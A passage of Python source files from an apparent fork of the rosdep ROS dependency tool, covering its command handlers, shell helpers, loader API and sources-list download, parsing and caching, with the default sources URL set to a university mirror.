print('ERROR: cannot download default sources list from:\n%s\nWebsite may be down.' % (DEFAULT_SOURCES_LIST_URL))
print(e)
return 4
# reuse path variable for error message
path = get_sources_list_dir()
old_umask = os.umask(0o022)
try:
if not os.path.exists(path):
os.makedirs(path)
path = get_default_sources_list_file()
if os.path.exists(path):
print('ERROR: default sources list file already exists:\n\t%s\nDelete !!' % (path))
os.remove(path)
# return 1
with open(path, 'w') as f:
f.write(data)
print('Wrote %s' % (path))
print('Recommended: please run\n\n\trosdep update\n')
except IOError as e:
print('ERROR: cannot create %s:\n\t%s' % (path, e), file=sys.stderr)
return 2
except OSError as e:
print("ERROR: cannot create %s:\n\t%s\nPerhaps you need to run 'sudo rosdep init' instead" % (path, e), file=sys.stderr)
return 3
finally:
os.umask(old_umask)
def command_update(options):
error_occured = []
def update_success_handler(data_source):
print('Hit %s' % (data_source.url))
def update_error_handler(data_source, exc):
error_string = 'ERROR: unable to process source [%s]:\n\t%s' % (data_source.url, exc)
print(error_string, file=sys.stderr)
error_occured.append(error_string)
sources_list_dir = get_sources_list_dir()
# disable deprecation warnings when using the command-line tool
warnings.filterwarnings('ignore', category=PreRep137Warning)
if not os.path.exists(sources_list_dir):
print('ERROR: no sources directory exists on the system meaning rosdep has not yet been initialized.\n\nPlease initialize your rosdep with\n\n\tsudo rosdep init\n')
return 1
filelist = [f for f in os.listdir(sources_list_dir) if f.endswith('.list')]
if not filelist:
print('ERROR: no data sources in %s\n\nPlease initialize your rosdep with\n\n\tsudo rosdep init\n' % sources_list_dir, file=sys.stderr)
return 1
try:
print('reading in sources list data from %s' % (sources_list_dir))
sources_cache_dir = get_sources_cache_dir()
try:
if os.geteuid() == 0:
print("Warning: running 'rosdep update' as root is not recommended.", file=sys.stderr)
print("You should run 'sudo rosdep fix-permissions' and invoke 'rosdep update' again without sudo.", file=sys.stderr)
except AttributeError:
# nothing we wanna do under Windows
pass
update_sources_list(success_handler=update_success_handler,
error_handler=update_error_handler,
skip_eol_distros=not options.include_eol_distros,
ros_distro=options.ros_distro)
print('updated cache in %s' % (sources_cache_dir))
except InvalidData as e:
print('ERROR: invalid sources list file:\n\t%s' % (e), file=sys.stderr)
return 1
except IOError as e:
print('ERROR: error loading sources list:\n\t%s' % (e), file=sys.stderr)
return 1
except ValueError as e:
print('ERROR: invalid argument value provided:\n\t%s' % (e), file=sys.stderr)
return 1
if error_occured:
print('ERROR: Not all sources were able to be updated.\n[[[')
for e in error_occured:
print(e)
print(']]]')
return 1
def command_keys(lookup, packages, options):
lookup = _get_default_RosdepLookup(options)
rosdep_keys = get_keys(lookup, packages, options.recursive)
prune_catkin_packages(rosdep_keys, options.verbose)
_print_lookup_errors(lookup)
print('\n'.join(rosdep_keys))
def get_keys(lookup, packages, recursive):
rosdep_keys = set() # using a set to ensure uniqueness
for package_name in packages:
deps = lookup.get_rosdeps(package_name, implicit=recursive)
rosdep_keys.update(deps)
return list(rosdep_keys)
def command_check(lookup, packages, options):
verbose = options.verbose
installer_context = create_default_installer_context(verbose=verbose)
configure_installer_context(installer_context, options)
installer = RosdepInstaller(installer_context, lookup)
uninstalled, errors = installer.get_uninstalled(packages, implicit=options.recursive, verbose=verbose)
# pretty print the result
if [v for k, v in uninstalled if v]:
print('System dependencies have not been satisfied:')
for installer_key, resolved in uninstalled:
if resolved:
for r in resolved:
print('%s\t%s' % (installer_key, r))
else:
print('All system dependencies have been satisfied')
if errors:
for package_name, ex in errors.items():
if isinstance(ex, rospkg.ResourceNotFound):
print('ERROR[%s]: resource not found [%s]' % (package_name, ex.args[0]), file=sys.stderr)
else:
print('ERROR[%s]: %s' % (package_name, ex), file=sys.stderr)
if uninstalled:
return 1
else:
return 0
def error_to_human_readable(error):
if isinstance(error, rospkg.ResourceNotFound):
return 'Missing resource %s' % (error,)
elif isinstance(error, ResolutionError):
return '%s' % (error.args[0],)
else:
return '%s' % (error,)
def command_install(lookup, packages, options):
# map options
install_options = dict(interactive=not options.default_yes, verbose=options.verbose,
reinstall=options.reinstall,
continue_on_error=options.robust, simulate=options.simulate, quiet=options.quiet)
# setup installer
installer_context = create_default_installer_context(verbose=options.verbose)
configure_installer_context(installer_context, options)
installer = RosdepInstaller(installer_context, lookup)
if options.reinstall:
if options.verbose:
print('reinstall is true, resolving all dependencies')
try:
uninstalled, errors = lookup.resolve_all(packages, installer_context, implicit=options.recursive)
except InvalidData as e:
print('ERROR: unable to process all dependencies:\n\t%s' % (e), file=sys.stderr)
return 1
else:
uninstalled, errors = installer.get_uninstalled(packages, implicit=options.recursive, verbose=options.verbose)
if options.verbose:
uninstalled_dependencies = normalize_uninstalled_to_list(uninstalled)
print('uninstalled dependencies are: [%s]' % ', '.join(uninstalled_dependencies))
if errors:
err_msg = ('ERROR: the following packages/stacks could not have their '
'rosdep keys resolved\nto system dependencies')
if rospkg.distro.current_distro_codename() is None:
err_msg += (
' (ROS distro is not set. '
'Make sure `ROS_DISTRO` environment variable is set, or use '
'`--rosdistro` option to specify the distro, '
'e.g. `--rosdistro indigo`)'
)
print(err_msg + ':', file=sys.stderr)
for rosdep_key, error in errors.items():
print('%s: %s' % (rosdep_key, error_to_human_readable(error)), file=sys.stderr)
if options.robust:
print('Continuing to install resolvable dependencies...')
else:
return 1
try:
installer.install(uninstalled, **install_options)
if not options.simulate:
print('#All required rosdeps installed successfully')
return 0
except KeyError as e:
raise RosdepInternalError(e)
except InstallFailed as e:
print('ERROR: the following rosdeps failed to install', file=sys.stderr)
print('\n'.join([' %s: %s' % (k, m) for k, m in e.failures]), file=sys.stderr)
return 1
def command_db(options):
# exact same setup logic as command_resolve, should possibly combine
lookup = _get_default_RosdepLookup(options)
installer_context = create_default_installer_context(verbose=options.verbose)
configure_installer_context(installer_context, options)
os_name, os_version = installer_context.get_os_name_and_version()
try:
installer_keys = installer_context.get_os_installer_keys(os_name)
default_key = installer_context.get_default_os_installer_key(os_name)
except KeyError:
raise UnsupportedOs(os_name, installer_context.get_os_keys())
installer = installer_context.get_installer(default_key)
print('OS NAME: %s' % os_name)
print('OS VERSION: %s' % os_version)
errors = []
print('DB [key -> resolution]')
# db does not leverage the resource-based API
view = lookup.get_rosdep_view(DEFAULT_VIEW_KEY, verbose=options.verbose)
for rosdep_name in view.keys():
try:
d = view.lookup(rosdep_name)
inst_key, rule = d.get_rule_for_platform(os_name, os_version, installer_keys, default_key)
if options.filter_for_installers and inst_key not in options.filter_for_installers:
continue
resolved = installer.resolve(rule)
resolved_str = ' '.join([str(r) for r in resolved])
print('%s -> %s' % (rosdep_name, resolved_str))
except ResolutionError as e:
errors.append(e)
# TODO: add command-line option for users to be able to see this.
# This is useful for platform bringup, but useless for most users
# as the rosdep db contains numerous, platform-specific keys.
if 0:
for error in errors:
print('WARNING: %s' % (error_to_human_readable(error)), file=sys.stderr)
def _print_lookup_errors(lookup):
for error in lookup.get_errors():
if isinstance(error, rospkg.ResourceNotFound):
print('WARNING: unable to locate resource %s' % (str(error.args[0])), file=sys.stderr)
else:
print('WARNING: %s' % (str(error)), file=sys.stderr)
def command_what_needs(args, options):
lookup = _get_default_RosdepLookup(options)
packages = []
for rosdep_name in args:
packages.extend(lookup.get_resources_that_need(rosdep_name))
_print_lookup_errors(lookup)
print('\n'.join(set(packages)))
def command_where_defined(args, options):
lookup = _get_default_RosdepLookup(options)
locations = []
for rosdep_name in args:
locations.extend(lookup.get_views_that_define(rosdep_name))
_print_lookup_errors(lookup)
if locations:
for location in locations:
origin = location[1]
print(origin)
else:
print('ERROR: cannot find definition(s) for [%s]' % (', '.join(args)), file=sys.stderr)
return 1
def command_resolve(args, options):
lookup = _get_default_RosdepLookup(options)
installer_context = create_default_installer_context(verbose=options.verbose)
configure_installer_context(installer_context, options)
installer, installer_keys, default_key, \
os_name, os_version = get_default_installer(installer_context=installer_context,
verbose=options.verbose)
invalid_key_errors = []
for rosdep_name in args:
if len(args) > 1:
print('#ROSDEP[%s]' % rosdep_name)
view = lookup.get_rosdep_view(DEFAULT_VIEW_KEY, verbose=options.verbose)
try:
d = view.lookup(rosdep_name)
except KeyError as e:
invalid_key_errors.append(e)
continue
rule_installer, rule = d.get_rule_for_platform(os_name, os_version, installer_keys, default_key)
installer = installer_context.get_installer(rule_installer)
resolved = installer.resolve(rule)
print('#%s' % (rule_installer))
print(' '.join([str(r) for r in resolved]))
for error in invalid_key_errors:
print('ERROR: no rosdep rule for %s' % (error), file=sys.stderr)
for error in lookup.get_errors():
print('WARNING: %s' % (error_to_human_readable(error)), file=sys.stderr)
if invalid_key_errors:
return 1 # error exit code
def command_fix_permissions(options):
import os
import pwd
import grp
stat_info = os.stat(os.path.expanduser('~'))
uid = stat_info.st_uid
gid = stat_info.st_gid
user_name = pwd.getpwuid(uid).pw_name
try:
group_name = grp.getgrgid(gid).gr_name
except KeyError as e:
group_name = gid
ros_home = rospkg.get_ros_home()
print("Recursively changing ownership of ros home directory '{0}' "
"to '{1}:{2}' (current user)...".format(ros_home, user_name, group_name))
failed = []
try:
for dirpath, dirnames, filenames in os.walk(ros_home):
try:
os.lchown(dirpath, uid, gid)
except Exception as e:
failed.append((dirpath, str(e)))
for f in filenames:
try:
path = os.path.join(dirpath, f)
os.lchown(path, uid, gid)
except Exception as e:
failed.append((path, str(e)))
except Exception:
import traceback
traceback.print_exc()
print('Failed to walk directory. Try with sudo?')
else:
if failed:
print('Failed to change ownership for:')
for p, e in failed:
print('{0} --> {1}'.format(p, e))
print('Try with sudo?')
else:
print('Done.')
command_handlers = {
'db': command_db,
'check': command_check,
'keys': command_keys,
'install': command_install,
'what-needs': command_what_needs,
'where-defined': command_where_defined,
'resolve': command_resolve,
'init': command_init,
'update': command_update,
'fix-permissions': command_fix_permissions,
# backwards compat
'what_needs': command_what_needs,
'where_defined': command_where_defined,
'depdb': command_db,
}
# commands that accept rosdep names as args
_command_rosdep_args = ['what-needs', 'what_needs', 'where-defined', 'where_defined', 'resolve']
# commands that take no args
_command_no_args = ['update', 'init', 'db', 'fix-permissions']
_commands = command_handlers.keys() | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/main.py | main.py |
# Author Tully Foote/[email protected]
from __future__ import print_function
import os
import sys
import stat
import subprocess
import tempfile
from .core import rd_debug
if sys.hexversion > 0x03000000: # Python3
python3 = True
else:
python3 = False
env = dict(os.environ)
env['LANG'] = 'C'
def read_stdout(cmd, capture_stderr=False):
"""
Execute given command and return stdout and if requested also stderr.
:param cmd: command in a form that Popen understands (list of strings or one string)
:param suppress_stderr: If evaluates to True, capture output from stderr as
well and return it as well.
:return: if `capture_stderr` is evaluates to False, return the stdout of
the program as string (Note: stderr will be printed to the running
terminal). If it evaluates to True, tuple of strings: stdout output and
standard error output each as string.
"""
if capture_stderr:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
std_out, std_err = p.communicate()
if python3:
return std_out.decode(), std_err.decode()
else:
return std_out, std_err
else:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env)
std_out, std_err = p.communicate() # ignore stderr
if python3:
return std_out.decode()
else:
return std_out
def create_tempfile_from_string_and_execute(string_script, path=None, exec_fn=None):
"""
:param path: (optional) path to temp directory, or ``None`` to use default temp directory, ``str``
:param exec_fn: override subprocess.call with alternate executor (for testing)
"""
if path is None:
path = tempfile.gettempdir()
result = 1
try:
fh = tempfile.NamedTemporaryFile('w', delete=False)
fh.write(string_script)
fh.close()
rd_debug('Executing script below with cwd=%s\n{{{\n%s\n}}}\n' % (path, string_script))
try:
os.chmod(fh.name, stat.S_IRWXU)
if exec_fn is None:
result = subprocess.call(fh.name, cwd=path)
else:
result = exec_fn(fh.name, cwd=path)
except OSError as ex:
print('Execution failed with OSError: %s' % (ex))
finally:
if os.path.exists(fh.name):
os.remove(fh.name)
rd_debug('Return code was: %s' % (result))
return result == 0 | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/shell_utils.py | shell_utils.py |
# Author Ken Conley/[email protected]
"""
Base API for loading rosdep information by package or stack name.
This API is decoupled from the ROS packaging system to enable multiple
implementations of rosdep, including ones that don't rely on the ROS
packaging system. This is necessary, for example, to implement a
version of rosdep that works against tarballs of released stacks.
"""
import yaml
from .core import InvalidData
ROSDEP_YAML = 'rosdep.yaml'
class RosdepLoader:
"""
Base API for loading rosdep information by package or stack name.
"""
def load_rosdep_yaml(self, yaml_contents, origin):
"""
Utility routine for unmarshalling rosdep data encoded as YAML.
:param origin: origin of yaml contents (for error messages)
:raises: :exc:`yaml.YAMLError`
"""
try:
return yaml.safe_load(yaml_contents)
except yaml.YAMLError as e:
raise InvalidData('Invalid YAML in [%s]: %s' % (origin, e), origin=origin)
def load_view(self, view_name, rosdep_db, verbose=False):
"""
Load view data into rosdep_db. If the view has already been
loaded into rosdep_db, this method does nothing.
:param view_name: name of ROS stack to load, ``str``
:param rosdep_db: database to load stack data into, :class:`RosdepDatabase`
:raises: :exc:`InvalidData`
:raises: :exc:`rospkg.ResourceNotFound` if view cannot be located
"""
raise NotImplementedError(view_name, rosdep_db, verbose) # pychecker
def get_loadable_resources(self):
raise NotImplementedError()
def get_loadable_views(self):
raise NotImplementedError()
def get_rosdeps(self, resource_name, implicit=True):
"""
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be found.
"""
raise NotImplementedError(resource_name, implicit) # pychecker
def get_view_key(self, resource_name):
"""
Map *resource_name* to a view key. In rospkg, this maps a ROS
package name to a ROS stack name. If *resource_name* is a ROS
stack name, it returns the ROS stack name.
:returns: Name of view that *resource_name* is in, ``None`` if no associated view.
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be found.
"""
raise NotImplementedError(resource_name) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/loader.py | loader.py |
# Author Ken Conley/[email protected]
from __future__ import print_function
import os
import sys
import yaml
try:
from urllib.request import urlopen
from urllib.error import URLError
import urllib.request as request
except ImportError:
from urllib2 import urlopen
from urllib2 import URLError
import urllib2 as request
try:
import cPickle as pickle
except ImportError:
import pickle
from .cache_tools import compute_filename_hash, PICKLE_CACHE_EXT, write_atomic, write_cache_file
from .core import InvalidData, DownloadFailure, CachePermissionError
from .gbpdistro_support import get_gbprepo_as_rosdep_data, download_gbpdistro_as_rosdep_data
from .meta import MetaDatabase
from ._version import __version__
try:
import urlparse
except ImportError:
import urllib.parse as urlparse # py3k
try:
import httplib
except ImportError:
import http.client as httplib # py3k
import rospkg
import rospkg.distro
from .loader import RosdepLoader
from .rosdistrohelper import get_index, get_index_url
# default file to download with 'init' command in order to bootstrap
# rosdep
DEFAULT_SOURCES_LIST_URL = 'https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro/master/rosdep/sources.list.d/20-default.list'
# seconds to wait before aborting download of rosdep data
DOWNLOAD_TIMEOUT = 15.0
SOURCES_LIST_DIR = 'sources.list.d'
SOURCES_CACHE_DIR = 'sources.cache'
# name of index file for sources cache
CACHE_INDEX = 'index'
# extension for binary cache
SOURCE_PATH_ENV = 'ROSDEP_SOURCE_PATH'
def get_sources_list_dirs(source_list_dir):
if SOURCE_PATH_ENV in os.environ:
sdirs = os.environ[SOURCE_PATH_ENV].split(os.pathsep)
else:
sdirs = [source_list_dir]
for p in list(sdirs):
if not os.path.exists(p):
sdirs.remove(p)
return sdirs
def get_sources_list_dir():
# base of where we read config files from
# TODO: windows
if 0:
# we can't use etc/ros because environment config does not carry over under sudo
etc_ros = rospkg.get_etc_ros_dir()
else:
etc_ros = '/etc/ros'
# compute default system wide sources directory
sys_sources_list_dir = os.path.join(etc_ros, 'rosdep', SOURCES_LIST_DIR)
sources_list_dirs = get_sources_list_dirs(sys_sources_list_dir)
if sources_list_dirs:
return sources_list_dirs[0]
else:
return sys_sources_list_dir
def get_default_sources_list_file():
return os.path.join(get_sources_list_dir(), '20-default.list')
def get_sources_cache_dir():
ros_home = rospkg.get_ros_home()
return os.path.join(ros_home, 'rosdep', SOURCES_CACHE_DIR)
# Default rosdep.yaml format. For now this is the only valid type and
# is specified for future compatibility.
TYPE_YAML = 'yaml'
# git-buildpackage repo list
TYPE_GBPDISTRO = 'gbpdistro'
VALID_TYPES = [TYPE_YAML, TYPE_GBPDISTRO]
class DataSource(object):
def __init__(self, type_, url, tags, origin=None):
"""
:param type_: data source type, e.g. TYPE_YAML, TYPE_GBPDISTRO
:param url: URL of data location. For file resources, must
start with the file:// scheme. For remote resources, URL
must include a path.
:param tags: tags for matching data source to configurations
:param origin: filename or other indicator of where data came from for debugging.
:raises: :exc:`ValueError` if parameters do not validate
"""
# validate inputs
if type_ not in VALID_TYPES:
raise ValueError('type must be one of [%s]' % (','.join(VALID_TYPES)))
parsed = urlparse.urlparse(url)
if not parsed.scheme or (parsed.scheme != 'file' and not parsed.netloc) or parsed.path in ('', '/'):
raise ValueError('url must be a fully-specified URL with scheme, hostname, and path: %s' % (str(url)))
if not type(tags) == list:
raise ValueError('tags must be a list: %s' % (str(tags)))
self.type = type_
self.tags = tags
self.url = url
self.origin = origin
def __eq__(self, other):
return isinstance(other, DataSource) and \
self.type == other.type and \
self.tags == other.tags and \
self.url == other.url and \
self.origin == other.origin
def __str__(self):
if self.origin:
return '[%s]:\n%s %s %s' % (self.origin, self.type, self.url, ' '.join(self.tags))
else:
return '%s %s %s' % (self.type, self.url, ' '.join(self.tags))
def __repr__(self):
return repr((self.type, self.url, self.tags, self.origin))
class RosDistroSource(DataSource):
def __init__(self, distro):
self.type = TYPE_GBPDISTRO
self.tags = [distro]
# In this case self.url is a list if REP-143 is being used
self.url = get_index().distributions[distro]['distribution']
self.origin = None
# create function we can pass in as model to parse_source_data. The
# function emulates the CachedDataSource constructor but does the
# necessary full filepath calculation and loading of data.
def cache_data_source_loader(sources_cache_dir, verbose=False):
def create_model(type_, uri, tags, origin=None):
# compute the filename has from the URL
filename = compute_filename_hash(uri)
filepath = os.path.join(sources_cache_dir, filename)
pickle_filepath = filepath + PICKLE_CACHE_EXT
if os.path.exists(pickle_filepath):
if verbose:
print('loading cached data source:\n\t%s\n\t%s' % (uri, pickle_filepath), file=sys.stderr)
with open(pickle_filepath, 'rb') as f:
rosdep_data = pickle.loads(f.read())
elif os.path.exists(filepath):
if verbose:
print('loading cached data source:\n\t%s\n\t%s' % (uri, filepath), file=sys.stderr)
with open(filepath) as f:
rosdep_data = yaml.safe_load(f.read())
else:
rosdep_data = {}
return CachedDataSource(type_, uri, tags, rosdep_data, origin=filepath)
return create_model
class CachedDataSource(object):
def __init__(self, type_, url, tags, rosdep_data, origin=None):
"""
Stores data source and loaded rosdep data for that source.
NOTE: this is not a subclass of DataSource, though it's API is
duck-type compatible with the DataSource API.
"""
self.source = DataSource(type_, url, tags, origin=origin)
self.rosdep_data = rosdep_data
def __eq__(self, other):
try:
return self.source == other.source and \
self.rosdep_data == other.rosdep_data
except AttributeError:
return False
def __str__(self):
return '%s\n%s' % (self.source, self.rosdep_data)
def __repr__(self):
return repr((self.type, self.url, self.tags, self.rosdep_data, self.origin))
@property
def type(self):
"""
:returns: data source type
"""
return self.source.type
@property
def url(self):
"""
:returns: data source URL
"""
return self.source.url
@property
def tags(self):
"""
:returns: data source tags
"""
return self.source.tags
@property
def origin(self):
"""
:returns: data source origin, if set, or ``None``
"""
return self.source.origin
class DataSourceMatcher(object):
def __init__(self, tags):
self.tags = tags
def matches(self, rosdep_data_source):
"""
Check if the datasource matches this configuration.
:param rosdep_data_source: :class:`DataSource`
"""
# all of the rosdep_data_source tags must be in our matcher tags
return not any(set(rosdep_data_source.tags) - set(self.tags))
@staticmethod
def create_default(os_override=None):
"""
Create a :class:`DataSourceMatcher` to match the current
configuration.
:param os_override: (os_name, os_codename) tuple to override
OS detection
:returns: :class:`DataSourceMatcher`
"""
distro_name = rospkg.distro.current_distro_codename()
if os_override is None:
os_detect = rospkg.os_detect.OsDetect()
os_name, os_version, os_codename = os_detect.detect_os()
else:
os_name, os_codename = os_override
tags = [t for t in (distro_name, os_name, os_codename) if t]
return DataSourceMatcher(tags)
def download_rosdep_data(url):
"""
:raises: :exc:`DownloadFailure` If data cannot be
retrieved (e.g. 404, bad YAML format, server down).
"""
try:
# http/https URLs need custom requests to specify the user-agent, since some repositories reject
# requests from the default user-agent.
if url.startswith("http://") or url.startswith("https://"):
url_request = request.Request(url, headers={'User-Agent': 'rosdep/{version}'.format(version=__version__)})
else:
url_request = url
f = urlopen(url_request, timeout=DOWNLOAD_TIMEOUT)
text = f.read()
f.close()
data = yaml.safe_load(text)
if type(data) != dict:
raise DownloadFailure('rosdep data from [%s] is not a YAML dictionary' % (url))
return data
except (URLError, httplib.HTTPException) as e:
raise DownloadFailure(str(e) + ' (%s)' % url)
except yaml.YAMLError as e:
raise DownloadFailure(str(e))
def download_default_sources_list(url=DEFAULT_SOURCES_LIST_URL):
"""
Download (and validate) contents of default sources list.
:param url: override URL of default sources list file
:return: raw sources list data, ``str``
:raises: :exc:`DownloadFailure` If data cannot be
retrieved (e.g. 404, bad YAML format, server down).
:raises: :exc:`urllib2.URLError` If data cannot be
retrieved (e.g. 404, server down).
"""
try:
f = urlopen(url, timeout=DOWNLOAD_TIMEOUT)
except (URLError, httplib.HTTPException) as e:
raise URLError(str(e) + ' (%s)' % url)
data = f.read().decode()
f.close()
if not data:
raise DownloadFailure('cannot download defaults file from %s : empty contents' % url)
# parse just for validation
try:
parse_sources_data(data)
except InvalidData as e:
raise DownloadFailure(
'The content downloaded from %s failed to pass validation.'
' It is likely that the source is invalid unless the data was corrupted during the download.'
' The contents were:{{{%s}}} The error raised was: %s' % (url, data, e))
return data
def parse_sources_data(data, origin='<string>', model=None):
"""
Parse sources file format (tags optional)::
# comments and empty lines allowed
<type> <uri> [tags]
e.g.::
yaml http://foo/rosdep.yaml fuerte lucid ubuntu
If tags are specified, *all* tags must match the current
configuration for the sources data to be used.
:param data: data in sources file format
:param model: model to load data into. Defaults to :class:`DataSource`
:returns: List of data sources, [:class:`DataSource`]
:raises: :exc:`InvalidData`
"""
if model is None:
model = DataSource
sources = []
for line in data.split('\n'):
line = line.strip()
# ignore empty lines or comments
if not line or line.startswith('#'):
continue
splits = line.split(' ')
if len(splits) < 2:
raise InvalidData('invalid line:\n%s' % (line), origin=origin)
type_ = splits[0]
url = splits[1]
tags = splits[2:]
try:
sources.append(model(type_, url, tags, origin=origin))
except ValueError as e:
raise InvalidData('line:\n\t%s\n%s' % (line, e), origin=origin)
return sources
def parse_sources_file(filepath):
"""
Parse file on disk
:returns: List of data sources, [:class:`DataSource`]
:raises: :exc:`InvalidData` If any error occurs reading
file, so an I/O error, non-existent file, or invalid format.
"""
try:
with open(filepath, 'r') as f:
return parse_sources_data(f.read(), origin=filepath)
except IOError as e:
raise InvalidData('I/O error reading sources file: %s' % (str(e)), origin=filepath)
def parse_sources_list(sources_list_dir=None):
"""
Parse data stored in on-disk sources list directory into a list of
:class:`DataSource` for processing.
:returns: List of data sources, [:class:`DataSource`]. If there is
no sources list dir, this returns an empty list.
:raises: :exc:`InvalidData`
:raises: :exc:`OSError` if *sources_list_dir* cannot be read.
:raises: :exc:`IOError` if *sources_list_dir* cannot be read.
"""
if sources_list_dir is None:
sources_list_dir = get_sources_list_dir()
sources_list_dirs = get_sources_list_dirs(sources_list_dir)
filelist = []
for sdir in sources_list_dirs:
filelist += sorted([os.path.join(sdir, f) for f in os.listdir(sdir) if f.endswith('.list')])
sources_list = []
for f in filelist:
sources_list.extend(parse_sources_file(f))
return sources_list
def _generate_key_from_urls(urls):
# urls may be a list of urls or a single string
try:
assert isinstance(urls, (list, basestring))
except NameError:
assert isinstance(urls, (list, str))
# We join the urls by the '^' character because it is not allowed in urls
return '^'.join(urls if isinstance(urls, list) else [urls])
def update_sources_list(sources_list_dir=None, sources_cache_dir=None,
success_handler=None, error_handler=None,
skip_eol_distros=False, ros_distro=None):
"""
Re-downloaded data from remote sources and store in cache. Also
update the cache index based on current sources.
:param sources_list_dir: override source list directory
:param sources_cache_dir: override sources cache directory
:param success_handler: fn(DataSource) to call if a particular
source loads successfully. This hook is mainly for printing
errors to console.
:param error_handler: fn(DataSource, DownloadFailure) to call
if a particular source fails. This hook is mainly for
printing errors to console.
:param skip_eol_distros: skip downloading sources for EOL distros
:returns: list of (`DataSource`, cache_file_path) pairs for cache
files that were updated, ``[str]``
:raises: :exc:`InvalidData` If any of the sources list files is invalid
:raises: :exc:`OSError` if *sources_list_dir* cannot be read.
:raises: :exc:`IOError` If *sources_list_dir* cannot be read or cache data cannot be written
"""
if sources_cache_dir is None:
sources_cache_dir = get_sources_cache_dir()
sources = parse_sources_list(sources_list_dir=sources_list_dir)
retval = []
for source in list(sources):
try:
if source.type == TYPE_YAML:
rosdep_data = download_rosdep_data(source.url)
elif source.type == TYPE_GBPDISTRO: # DEPRECATED, do not use this file. See REP137
if not source.tags[0] in ['electric', 'fuerte']:
print('Ignore legacy gbpdistro "%s"' % source.tags[0])
sources.remove(source)
continue # do not store this entry in the cache
rosdep_data = download_gbpdistro_as_rosdep_data(source.url)
retval.append((source, write_cache_file(sources_cache_dir, source.url, rosdep_data)))
if success_handler is not None:
success_handler(source)
except DownloadFailure as e:
if error_handler is not None:
error_handler(source, e)
# Additional sources for ros distros
# In compliance with REP137 and REP143
python_versions = {}
print('Query rosdistro index %s' % get_index_url())
distribution_names = get_index().distributions.keys()
if ros_distro is not None and ros_distro not in distribution_names:
raise ValueError(
'Requested distribution "%s" is not in the index.' % ros_distro)
for dist_name in sorted(distribution_names):
distribution = get_index().distributions[dist_name]
if dist_name != ros_distro:
if ros_distro is not None:
print('Skip distro "%s" different from requested "%s"' % (dist_name, ros_distro))
continue
if skip_eol_distros:
if distribution.get('distribution_status') == 'end-of-life':
print('Skip end-of-life distro "%s"' % dist_name)
continue
print('Add distro "%s"' % dist_name)
rds = RosDistroSource(dist_name)
rosdep_data = get_gbprepo_as_rosdep_data(dist_name)
# Store Python version from REP153
if distribution.get('python_version'):
python_versions[dist_name] = distribution.get('python_version')
# dist_files can either be a string (single filename) or a list (list of filenames)
dist_files = distribution['distribution']
key = _generate_key_from_urls(dist_files)
retval.append((rds, write_cache_file(sources_cache_dir, key, rosdep_data)))
sources.append(rds)
# cache metadata that isn't a source list
MetaDatabase().set('ROS_PYTHON_VERSION', python_versions)
# Create a combined index of *all* the sources. We do all the
# sources regardless of failures because a cache from a previous
# attempt may still exist. We have to do this cache index so that
# loads() see consistent data.
if not os.path.exists(sources_cache_dir):
os.makedirs(sources_cache_dir)
cache_index = os.path.join(sources_cache_dir, CACHE_INDEX)
data = "#autogenerated by rosdep, do not edit. use 'rosdep update' instead\n"
for source in sources:
url = _generate_key_from_urls(source.url)
data += 'yaml %s %s\n' % (url, ' '.join(source.tags))
write_atomic(cache_index, data)
# mainly for debugging and testing
return retval
def load_cached_sources_list(sources_cache_dir=None, verbose=False):
"""
Load cached data based on the sources list.
:returns: list of :class:`CachedDataSource` instance with raw
rosdep data loaded.
:raises: :exc:`OSError` if cache cannot be read
:raises: :exc:`IOError` if cache cannot be read
"""
if sources_cache_dir is None:
sources_cache_dir = get_sources_cache_dir()
cache_index = os.path.join(sources_cache_dir, 'index')
if not os.path.exists(cache_index):
if verbose:
print('no cache index present, not loading cached sources', file=sys.stderr)
return []
try:
with open(cache_index, 'r') as f:
cache_data = f.read()
except IOError as e:
if e.strerror == 'Permission denied':
raise CachePermissionError('Failed to write cache file: ' + str(e))
else:
raise
# the loader does all the work
model = cache_data_source_loader(sources_cache_dir, verbose=verbose)
return parse_sources_data(cache_data, origin=cache_index, model=model)
class SourcesListLoader(RosdepLoader):
"""
SourcesList loader implements the general RosdepLoader API. This
implementation is fairly simple as there is only one view the
source list loader can create. It is also a bit degenerate as it
is not capable of mapping resource names to views, thus any
resource-name-based API fails or returns nothing interesting.
This loader should not be used directly; instead, it is more
useful composed with other higher-level implementations, like the
:class:`rosdep2.rospkg_loader.RospkgLoader`. The general intent
is to compose it with another loader by making all of the other
loader's views depends on all the views in this loader.
"""
ALL_VIEW_KEY = 'sources.list'
def __init__(self, sources):
"""
:param sources: cached sources list entries, [:class:`CachedDataSource`]
"""
self.sources = sources
@staticmethod
def create_default(matcher=None, sources_cache_dir=None, os_override=None, verbose=False):
"""
:param matcher: override DataSourceMatcher. Defaults to
DataSourceMatcher.create_default().
:param sources_cache_dir: override location of sources cache
"""
if matcher is None:
matcher = DataSourceMatcher.create_default(os_override=os_override)
if verbose:
print('using matcher with tags [%s]' % (', '.join(matcher.tags)), file=sys.stderr)
sources = load_cached_sources_list(sources_cache_dir=sources_cache_dir, verbose=verbose)
if verbose:
print('loaded %s sources' % (len(sources)), file=sys.stderr)
sources = [x for x in sources if matcher.matches(x)]
if verbose:
print('%s sources match current tags' % (len(sources)), file=sys.stderr)
return SourcesListLoader(sources)
def load_view(self, view_name, rosdep_db, verbose=False):
"""
Load view data into rosdep_db. If the view has already been
loaded into rosdep_db, this method does nothing.
:param view_name: name of ROS stack to load, ``str``
:param rosdep_db: database to load stack data into, :class:`RosdepDatabase`
:raises: :exc:`InvalidData`
"""
if rosdep_db.is_loaded(view_name):
return
source = self.get_source(view_name)
if verbose:
print('loading view [%s] with sources.list loader' % (view_name), file=sys.stderr)
view_dependencies = self.get_view_dependencies(view_name)
rosdep_db.set_view_data(view_name, source.rosdep_data, view_dependencies, view_name)
def get_loadable_resources(self):
return []
def get_loadable_views(self):
return [x.url for x in self.sources]
def get_view_dependencies(self, view_name):
# use dependencies to implement precedence
if view_name != SourcesListLoader.ALL_VIEW_KEY:
# if the view_name matches one of our sources, return
# empty list as none of our sources has deps.
if any([x for x in self.sources if view_name == x.url]):
return []
# not one of our views, so it depends on everything we provide
